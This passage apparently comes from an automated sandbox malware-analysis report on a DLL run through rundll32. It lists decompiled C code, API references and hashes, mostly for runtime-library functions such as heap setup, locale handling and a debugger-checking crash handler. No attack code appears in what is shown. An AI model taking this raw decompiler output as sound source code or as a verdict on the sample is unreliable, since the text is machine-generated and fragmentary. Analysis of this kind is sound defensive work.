                                                                                                                                  • Part of subcall function 10003C50: _memset.LIBCMT ref: 10003C64
                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?), ref: 10003E44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual$_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1876456587-0
                                                                                                                                • Opcode ID: f7401d659560031d9c17cb10a26f9ff5ef52e57436c2b187bbb76e7774026977
                                                                                                                                • Instruction ID: f15a86c0704b51378d86cbb5121b1bdfad3b0682261688cfccde8590deb210b6
                                                                                                                                • Opcode Fuzzy Hash: f7401d659560031d9c17cb10a26f9ff5ef52e57436c2b187bbb76e7774026977
                                                                                                                                • Instruction Fuzzy Hash: 04319A796042419BE321CF08DC81F6BB3E9EF88794F15892DE9858B384D774EC49CB61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 301 1000d836-1000d858 HeapCreate 302 1000d85a-1000d85b 301->302 303 1000d85c-1000d865 301->303
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E1000D836(intOrPtr _a4) {
                                                                                                                                				void* _t6;
                                                                                                                                
                                                                                                                                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                				 *0x1001ce68 = _t6;
                                                                                                                                				if(_t6 != 0) {
                                                                                                                                					 *0x1001d0e8 = 1;
                                                                                                                                					return 1;
                                                                                                                                				} else {
                                                                                                                                					return _t6;
                                                                                                                                				}
                                                                                                                                			}





                                                                                                                                APIs
                                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,?,1000785F,00000001,?,?,?,100079D8,?,?,?,10019940,0000000C,10007A93), ref: 1000D84B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 10892065-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 304 1000b863-1000b869 call 1000b721 306 1000b86e-1000b871 304->306
                                                                                                                                C-Code - Quality: 25%
                                                                                                                                			E1000B863() {
                                                                                                                                				void* _t1;
                                                                                                                                				void* _t2;
                                                                                                                                				void* _t3;
                                                                                                                                				void* _t4;
                                                                                                                                				void* _t7;
                                                                                                                                
                                                                                                                                				_push(1);
                                                                                                                                				_push(0);
                                                                                                                                				_push(0); // executed
                                                                                                                                				_t1 = E1000B721(_t2, _t3, _t4, _t7); // executed
                                                                                                                                				return _t1;
                                                                                                                                			}









                                                                                                                                APIs
                                                                                                                                • _doexit.LIBCMT ref: 1000B869
                                                                                                                                  • Part of subcall function 1000B721: __lock.LIBCMT ref: 1000B72F
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B766
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B77B
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7A5
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7BB
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7C8
                                                                                                                                  • Part of subcall function 1000B721: __initterm.LIBCMT ref: 1000B7F7
                                                                                                                                  • Part of subcall function 1000B721: __initterm.LIBCMT ref: 1000B807
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1597249276-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 310 10015810-1001581c TlsFree
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10015810() {
                                                                                                                                				long _t1;
                                                                                                                                				int _t2;
                                                                                                                                
                                                                                                                                				_t1 =  *0x1001c454; // 0x1f
                                                                                                                                				_t2 = TlsFree(_t1); // executed
                                                                                                                                				return _t2;
                                                                                                                                			}






                                                                                                                                APIs
                                                                                                                                • TlsFree.KERNEL32(0000001F), ref: 10015816
                                                                                                                                Similarity
                                                                                                                                • API ID: Free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3978063606-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 307 1000c18e-1000c190 call 1000c11c 309 1000c195-1000c196 307->309
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E1000C18E() {
                                                                                                                                				void* _t1;
                                                                                                                                
                                                                                                                                				_t1 = E1000C11C(0); // executed
                                                                                                                                				return _t1;
                                                                                                                                			}





                                                                                                                                APIs
                                                                                                                                • __encode_pointer.LIBCMT ref: 1000C190
                                                                                                                                  • Part of subcall function 1000C11C: TlsGetValue.KERNEL32(00000000,?,1000C195,00000000,10013C0B,1001C808,00000000,00000314,?,1000C0A7,1001C808,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C12E
                                                                                                                                  • Part of subcall function 1000C11C: TlsGetValue.KERNEL32(00000005,?,1000C195,00000000,10013C0B,1001C808,00000000,00000314,?,1000C0A7,1001C808,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C145
                                                                                                                                  • Part of subcall function 1000C11C: RtlEncodePointer.NTDLL(00000000,?,1000C195,00000000,10013C0B,1001C808,00000000,00000314,?,1000C0A7,1001C808,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C183
                                                                                                                                Similarity
                                                                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2585649348-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E100109FC(signed int __eax, void* __esi) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				char _v20;
                                                                                                                                				signed int _t142;
                                                                                                                                				signed int _t145;
                                                                                                                                				signed int _t148;
                                                                                                                                				signed int _t151;
                                                                                                                                				signed int _t154;
                                                                                                                                				signed int _t157;
                                                                                                                                				signed int _t159;
                                                                                                                                				signed int _t162;
                                                                                                                                				signed int _t165;
                                                                                                                                				signed int _t168;
                                                                                                                                				signed int _t171;
                                                                                                                                				signed int _t174;
                                                                                                                                				signed int _t177;
                                                                                                                                				signed int _t180;
                                                                                                                                				signed int _t183;
                                                                                                                                				signed int _t186;
                                                                                                                                				signed int _t189;
                                                                                                                                				signed int _t192;
                                                                                                                                				signed int _t195;
                                                                                                                                				signed int _t198;
                                                                                                                                				signed int _t201;
                                                                                                                                				signed int _t204;
                                                                                                                                				signed int _t207;
                                                                                                                                				signed int _t210;
                                                                                                                                				signed int _t213;
                                                                                                                                				signed int _t216;
                                                                                                                                				signed int _t219;
                                                                                                                                				signed int _t222;
                                                                                                                                				signed int _t225;
                                                                                                                                				signed int _t228;
                                                                                                                                				signed int _t231;
                                                                                                                                				signed int _t234;
                                                                                                                                				signed int _t237;
                                                                                                                                				signed int _t240;
                                                                                                                                				signed int _t243;
                                                                                                                                				signed int _t246;
                                                                                                                                				signed int _t249;
                                                                                                                                				signed int _t252;
                                                                                                                                				signed int _t255;
                                                                                                                                				signed int _t258;
                                                                                                                                				signed int _t261;
                                                                                                                                				signed int _t264;
                                                                                                                                				signed int _t267;
                                                                                                                                				signed int _t270;
                                                                                                                                				signed int _t276;
                                                                                                                                
                                                                                                                                				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                                                                                                                                				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                                                                                                                                				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                                                                                                                                				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                                                                                                                                				if(__esi != 0) {
                                                                                                                                					_v16 = _v16 & 0x00000000;
                                                                                                                                					_v20 = __eax;
                                                                                                                                					_t142 = E1000C727(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                                                                                                                                					_t145 = E1000C727(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                                                                                                                                					_t148 = E1000C727(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                                                                                                                                					_t151 = E1000C727(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                                                                                                                                					_t154 = E1000C727(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                                                                                                                                					_t157 = E1000C727(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                                                                                                                                					_t159 = E1000C727(_t279,  &_v20, 1, _v8, 0x37, __esi);
                                                                                                                                					_t162 = E1000C727(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                                                                                                                                					_t165 = E1000C727(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                                                                                                                                					_t168 = E1000C727(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                                                                                                                                					_t171 = E1000C727(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                                                                                                                                					_t174 = E1000C727(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                                                                                                                                					_t177 = E1000C727(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                                                                                                                                					_t180 = E1000C727(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                                                                                                                                					_t183 = E1000C727(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                                                                                                                                					_t186 = E1000C727(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                                                                                                                                					_t189 = E1000C727(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                                                                                                                                					_t192 = E1000C727(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                                                                                                                                					_t195 = E1000C727(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                                                                                                                                					_t198 = E1000C727(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                                                                                                                                					_t201 = E1000C727(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                                                                                                                                					_t204 = E1000C727(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                                                                                                                                					_t207 = E1000C727(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                                                                                                                                					_t210 = E1000C727(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                                                                                                                                					_t213 = E1000C727(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                                                                                                                                					_t216 = E1000C727(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                                                                                                                                					_t219 = E1000C727(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                                                                                                                                					_t222 = E1000C727(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                                                                                                                                					_t225 = E1000C727(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                                                                                                                                					_t228 = E1000C727(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                                                                                                                                					_t231 = E1000C727(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                                                                                                                                					_t234 = E1000C727(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                                                                                                                                					_t237 = E1000C727(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                                                                                                                                					_t240 = E1000C727(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                                                                                                                                					_t243 = E1000C727(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                                                                                                                                					_t246 = E1000C727(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                                                                                                                                					_t249 = E1000C727(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                                                                                                                                					_t252 = E1000C727(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                                                                                                                                					_t255 = E1000C727(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                                                                                                                                					_t258 = E1000C727(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                                                                                                                                					_t261 = E1000C727(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                                                                                                                                					_t264 = E1000C727(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                                                                                                                                					_t267 = E1000C727(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                                                                                                                                					_t276 = _v12;
                                                                                                                                					_t270 = E1000C727(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                                                                                                                                					 *(__esi + 0xac) = _t276;
                                                                                                                                					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                                                                                                                                				} else {
                                                                                                                                					return __eax | 0xffffffff;
                                                                                                                                				}
                                                                                                                                			}

APIs
Memory Dump Source
• Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
• Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
• Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
• Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
Similarity
• API ID: ___getlocaleinfo
• String ID:
• API String ID: 1937885557-0
• Opcode ID: d04f72e6812a02fed01aee00663be6446466a87147cf99734c158c6a74e1d766
• Instruction ID: 373a512ba0ef4fc8f422f1cc41f902c08c3998079d01379570979cb3c01b4451
• Opcode Fuzzy Hash: d04f72e6812a02fed01aee00663be6446466a87147cf99734c158c6a74e1d766
• Instruction Fuzzy Hash: 24E1BDB290021DBEFB15CBE1CD85DFF77BDEB14784F04092AB259E2041EA75AA059B60
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10007528(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                				intOrPtr _v0;
                                                                                                                                				void* _v804;
                                                                                                                                				intOrPtr _v808;
                                                                                                                                				intOrPtr _v812;
                                                                                                                                				intOrPtr _t6;
                                                                                                                                				intOrPtr _t11;
                                                                                                                                				intOrPtr _t12;
                                                                                                                                				intOrPtr _t13;
                                                                                                                                				long _t17;
                                                                                                                                				intOrPtr _t21;
                                                                                                                                				intOrPtr _t22;
                                                                                                                                				intOrPtr _t25;
                                                                                                                                				intOrPtr _t26;
                                                                                                                                				intOrPtr _t27;
                                                                                                                                				intOrPtr* _t31;
                                                                                                                                				void* _t34;
                                                                                                                                
                                                                                                                                				_t27 = __esi;
                                                                                                                                				_t26 = __edi;
                                                                                                                                				_t25 = __edx;
                                                                                                                                				_t22 = __ecx;
                                                                                                                                				_t21 = __ebx;
                                                                                                                                				_t6 = __eax;
                                                                                                                                				_t34 = _t22 -  *0x1001b694; // 0x9a1487b
                                                                                                                                				if(_t34 == 0) {
                                                                                                                                					asm("repe ret");
                                                                                                                                				}
                                                                                                                                				 *0x1001cc48 = _t6;
                                                                                                                                				 *0x1001cc44 = _t22;
                                                                                                                                				 *0x1001cc40 = _t25;
                                                                                                                                				 *0x1001cc3c = _t21;
                                                                                                                                				 *0x1001cc38 = _t27;
                                                                                                                                				 *0x1001cc34 = _t26;
                                                                                                                                				 *0x1001cc60 = ss;
                                                                                                                                				 *0x1001cc54 = cs;
                                                                                                                                				 *0x1001cc30 = ds;
                                                                                                                                				 *0x1001cc2c = es;
                                                                                                                                				 *0x1001cc28 = fs;
                                                                                                                                				 *0x1001cc24 = gs;
                                                                                                                                				asm("pushfd");
                                                                                                                                				_pop( *0x1001cc58);
                                                                                                                                				 *0x1001cc4c =  *_t31;
                                                                                                                                				 *0x1001cc50 = _v0;
                                                                                                                                				 *0x1001cc5c =  &_a4;
                                                                                                                                				 *0x1001cb98 = 0x10001;
                                                                                                                                				_t11 =  *0x1001cc50; // 0x0
                                                                                                                                				 *0x1001cb4c = _t11;
                                                                                                                                				 *0x1001cb40 = 0xc0000409;
                                                                                                                                				 *0x1001cb44 = 1;
                                                                                                                                				_t12 =  *0x1001b694; // 0x9a1487b
                                                                                                                                				_v812 = _t12;
                                                                                                                                				_t13 =  *0x1001b698; // 0xf65eb784
                                                                                                                                				_v808 = _t13;
                                                                                                                                				 *0x1001cb90 = IsDebuggerPresent();
                                                                                                                                				_push(1);
                                                                                                                                				E1000CB48(_t14);
                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                				_t17 = UnhandledExceptionFilter(0x100177f4);
                                                                                                                                				if( *0x1001cb90 == 0) {
                                                                                                                                					_push(1);
                                                                                                                                					E1000CB48(_t17);
                                                                                                                                				}
                                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                			}

                                                                                                                                APIs
                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 1000CD27
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000CD3C
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(100177F4), ref: 1000CD47
                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 1000CD63
                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 1000CD6A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10005DB5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				intOrPtr _t18;
                                                                                                                                				void* _t23;
                                                                                                                                				void* _t39;
                                                                                                                                				intOrPtr _t43;
                                                                                                                                				void* _t44;
                                                                                                                                
                                                                                                                                				_push(0x14);
                                                                                                                                				E10007B2B(E100155AB, __ebx, __edi, __esi);
                                                                                                                                				E10006121(_t44 - 0x14, 0);
                                                                                                                                				_t43 =  *0x1001c478; // 0x0
                                                                                                                                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                                                                				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                                                                                                                                				_t18 = E100049C5( *((intOrPtr*)(_t44 + 8)), E100048D1(0x1001c510));
                                                                                                                                				_t41 = _t18;
                                                                                                                                				if(_t18 == 0) {
                                                                                                                                					if(_t43 == 0) {
                                                                                                                                						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                                                                						_push(_t44 - 0x10);
                                                                                                                                						_t23 = E10005C33(__ebx, _t41, _t43, __eflags);
                                                                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                                                                						if(_t23 == 0xffffffff) {
                                                                                                                                							E10006AB2(_t44 - 0x20, "bad cast");
                                                                                                                                							E10006B9C(_t44 - 0x20, 0x10019754);
                                                                                                                                						}
                                                                                                                                						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                						 *0x1001c478 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                						E10004908( *((intOrPtr*)(_t44 - 0x10)));
                                                                                                                                						E100062C2(_t39, _t41, _t41);
                                                                                                                                					} else {
                                                                                                                                						_t41 = _t43;
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                                                                				E10006149(_t44 - 0x14);
                                                                                                                                				return E10007BCA(_t41);
                                                                                                                                			}









                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 10005DBC
                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 10005DC6
                                                                                                                                • int.LIBCPMT ref: 10005DDD
                                                                                                                                  • Part of subcall function 100048D1: std::_Lockit::_Lockit.LIBCPMT ref: 100048E4
                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 10005DE6
                                                                                                                                • codecvt.LIBCPMT ref: 10005E00
                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 10005E14
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10005E22
                                                                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 10005E32
                                                                                                                                • std::locale::facet::facet_Register.LIBCPMT ref: 10005E38
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                • String ID: bad cast
                                                                                                                                • API String ID: 577375395-3145022300
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10005B96(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				intOrPtr _t18;
                                                                                                                                				void* _t23;
                                                                                                                                				void* _t39;
                                                                                                                                				intOrPtr _t43;
                                                                                                                                				void* _t44;
                                                                                                                                
                                                                                                                                				_push(0x14);
                                                                                                                                				E10007B2B(E100155AB, __ebx, __edi, __esi);
                                                                                                                                				E10006121(_t44 - 0x14, 0);
                                                                                                                                				_t43 =  *0x1001c474; // 0x4c42b00
                                                                                                                                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                                                                				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                                                                                                                                				_t18 = E100049C5( *((intOrPtr*)(_t44 + 8)), E100048D1(0x1001c58c));
                                                                                                                                				_t41 = _t18;
                                                                                                                                				if(_t18 == 0) {
                                                                                                                                					if(_t43 == 0) {
                                                                                                                                						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                                                                						_push(_t44 - 0x10);
                                                                                                                                						_t23 = E10005797(__ebx, _t41, _t43, __eflags);
                                                                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                                                                						if(_t23 == 0xffffffff) {
                                                                                                                                							E10006AB2(_t44 - 0x20, "bad cast");
                                                                                                                                							E10006B9C(_t44 - 0x20, 0x10019754);
                                                                                                                                						}
                                                                                                                                						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                						 *0x1001c474 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                						E10004908( *((intOrPtr*)(_t44 - 0x10)));
                                                                                                                                						E100062C2(_t39, _t41, _t41);
                                                                                                                                					} else {
                                                                                                                                						_t41 = _t43;
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                                                                				E10006149(_t44 - 0x14);
                                                                                                                                				return E10007BCA(_t41);
                                                                                                                                			}









                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 10005B9D
                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 10005BA7
                                                                                                                                • int.LIBCPMT ref: 10005BBE
                                                                                                                                  • Part of subcall function 100048D1: std::_Lockit::_Lockit.LIBCPMT ref: 100048E4
                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 10005BC7
                                                                                                                                • ctype.LIBCPMT ref: 10005BE1
                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 10005BF5
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10005C03
                                                                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 10005C13
                                                                                                                                • std::locale::facet::facet_Register.LIBCPMT ref: 10005C19
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                • String ID: bad cast
                                                                                                                                • API String ID: 2535038987-3145022300
                                                                                                                                • Opcode ID: 1816dcfd00bc349030bf56c7733edbee8c3ccf0b53305d8e8004b0bedb9255de
                                                                                                                                • Instruction ID: 3b1dadb70a21d87053c8386d98094ff6d4f1cf2bc646d68969b6f1144a2338f9
                                                                                                                                • Opcode Fuzzy Hash: 1816dcfd00bc349030bf56c7733edbee8c3ccf0b53305d8e8004b0bedb9255de
                                                                                                                                • Instruction Fuzzy Hash: D301C0759002199BFB05DBB0CC52AFE7336EF443A1F214608E5106B1DADF38FA418B60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10001C50(void* __ecx, signed int _a4, char _a8) {
                                                                                                                                				intOrPtr _v8;
                                                                                                                                				char _v12;
                                                                                                                                				char _v40;
                                                                                                                                				char _v44;
                                                                                                                                				void* _v84;
                                                                                                                                				char _v88;
                                                                                                                                				char _v108;
                                                                                                                                				char _v112;
                                                                                                                                				void* _v152;
                                                                                                                                				char _v156;
                                                                                                                                				signed int _t30;
                                                                                                                                				signed int _t34;
                                                                                                                                				signed char _t48;
                                                                                                                                				void* _t60;
                                                                                                                                
                                                                                                                                				_push(0xffffffff);
                                                                                                                                				_push(E10015318);
                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                				_t30 =  *0x1001b694; // 0x9a1487b
                                                                                                                                				_push(_t30 ^ _t60 - 0x00000088);
                                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                                				_t34 = _a4 & 0x00000017;
                                                                                                                                				 *(__ecx + 8) = _t34;
                                                                                                                                				_t48 =  *(__ecx + 0xc) & _t34;
                                                                                                                                				if(_t48 != 0) {
                                                                                                                                					if(_a8 != 0) {
                                                                                                                                						E10006B9C(0, 0);
                                                                                                                                					}
                                                                                                                                					_t65 = _t48 & 0x00000004;
                                                                                                                                					if((_t48 & 0x00000004) != 0) {
                                                                                                                                						E10001AA0( &_v108, "ios_base::badbit set");
                                                                                                                                						_v8 = 0;
                                                                                                                                						E100019A0(_t58, _t65,  &_v112);
                                                                                                                                						_t48 =  &_v156;
                                                                                                                                						_v156 = 0x10016268;
                                                                                                                                						E10006B9C(_t48, 0x10019390);
